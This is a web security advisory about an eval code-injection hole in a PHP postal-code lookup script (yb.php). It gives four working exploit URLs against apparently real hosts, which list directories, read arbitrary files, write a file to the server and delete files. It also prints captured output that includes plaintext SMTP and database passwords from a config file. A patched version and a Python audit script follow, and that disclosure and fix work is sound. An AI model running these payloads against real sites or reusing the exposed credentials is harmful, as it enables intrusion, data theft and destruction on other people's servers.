Webmaster tools: high-risk security vulnerability in the "Postal Code / Area Code Lookup" tool

Method 1: checking the code on the server:

On the server, locate and open the PHP file that implements the "Postal Code / Area Code Lookup" (commonly named yb.php). The script is vulnerable if it contains the following code:
[php]
switch ($_GET['w']){
case "sheng":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");");break;
case "diqu":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");");break;
case "shi":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");");break;
case "cun":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");");break;
case "youbian":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");");break;
case "quhao":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");");break;
default:
@eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");");break;
}[/php]

#1 List directories and files; changing the value of parameter d scans the whole site

http://tool.51cto.com/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../../
[php]
Array
(
[0] => .
[1] => ..
[2] => .bash_history
[3] => .bash_logout
[4] => .bash_profile
[5] => .bashrc
[6] => .gnome2
[7] => .mozilla
[8] => .subversion
[9] => .viminfo
[10] => ECL
[11] => admin.0day5.com
[12] => admin.0day5.com.tar
[13] => backup
[14] => biaozhun
[15] => bk
[16] => 0day5.com
[17] => count.0day5.com
[18] => ipatent360
[19] => ipatent360.tar
[20] => keji
[21] => phpmyadmin
[22] => wenshuwenan
[23] => zixunbaogao
)[/php]
#2 Read a file; changing the value of parameter d reads any file on the site

http://tool.0day5.com/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../../admin.0day5.com/tool/config.php
[php]
[123] => if( ! defined( 'SMTP_EMAIL_ACTIVE_PASSWORD' ) ) {
[124] => define( 'SMTP_EMAIL_ACTIVE_PASSWORD', 'ecl123456' );
[125] => }
[126] => if( ! defined( 'PAGE_CHARSET' ) ) {
[127] => define( 'PAGE_CHARSET', 'utf-8' );
[128] => }
[129] => /**
[130] => * Statistics database, connection configuration
[131] => * @var
[132] => */
[133] => $GLB_DB_MEMBER_CONFIG = array(
[134] => 'host' => 'localhost',
[135] => 'username' => 'admin',
[136] => 'password' => 'egreen888888',
[137] => 'database' => 'caogenbanquan',
[138] => 'charset' => 'utf8'
[139] => );
[140] => ?>
)[/php]
#3 Write the legendary webshell; parameter d is the file content and n is the file name

Exploit:
http://tool.0day5.com/yb/yb.php?q=${@exit(var_dump(file_put_contents($_GET[n],$_GET[d])))}&d=by:0day5.com&n=./../1.txt

Resulting file URL:
http://tool.0day5.com/1.txt

#4 Delete a file; parameter n is the file name

http://tool.0day5.com//yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../1.txt

Fix:
[php]
switch ($_GET['w']){
case "sheng":
$found = eregi($keyword[$ai],$detail[0]);break;
case "diqu":
$found = eregi($keyword[$ai],$detail[1]);break;
case "shi":
$found = eregi($keyword[$ai],$detail[2]);break;
case "cun":
$found = eregi($keyword[$ai],$detail[3]);break;
case "youbian":
$found = eregi($keyword[$ai],$detail[4]);break;
case "quhao":
$found = eregi($keyword[$ai],$detail[5]);break;
default:
$found = eregi($keyword[$ai],$dreamdb[$i]);break;
}[/php]
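As an added example (not part of the original advisory), a small Python audit script that automates the code check from Method 1 and confirms the fix: it scans PHP source for `eval(` calls whose argument is a double-quoted string containing interpolated `$variables`, which is the pattern that lets attacker-controlled text become code. The embedded samples are a constructed excerpt of the vulnerable switch above and of its eval-free rewrite; the script file name and the `find_eval_interpolation` helper are assumptions of this example.

```python
import re
import sys

# eval( (optionally @-silenced) whose first argument is a double-quoted string literal.
# The group consumes escaped characters such as \" and \$ inside the string.
EVAL_CALL = re.compile(r'@?\beval\s*\(\s*"((?:[^"\\]|\\.)*)"')
# A $name that PHP interpolates inside double quotes (a \$ is a literal dollar sign).
INTERP = re.compile(r'(?<!\\)\$[A-Za-z_]\w*')


def find_eval_interpolation(php_source: str):
    """Return (line_number, [interpolated variables]) for each risky eval call.

    Only single-line eval calls are inspected, which matches the yb.php pattern."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in EVAL_CALL.finditer(line):
            names = sorted(set(INTERP.findall(m.group(1))))
            if names:
                findings.append((lineno, names))
    return findings


# Constructed samples: an excerpt of the vulnerable switch and its eval-free rewrite.
VULNERABLE = r'''switch ($_GET['w']){
case "sheng":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");");break;
case "diqu":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");");break;
default:
@eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");");break;
}'''

FIXED = r'''switch ($_GET['w']){
case "sheng":
$found = eregi($keyword[$ai],$detail[0]);break;
default:
$found = eregi($keyword[$ai],$dreamdb[$i]);break;
}'''

if __name__ == "__main__":
    # Usage: python audit_eval.py yb.php   (script name is an assumption of this example)
    if len(sys.argv) > 1:
        src = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        src = VULNERABLE
    for lineno, names in find_eval_interpolation(src):
        print(f"line {lineno}: eval interpolates {', '.join(names)}")
```

Run against the vulnerable excerpt it reports lines 3, 5 and 7; against the fixed version it reports nothing.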
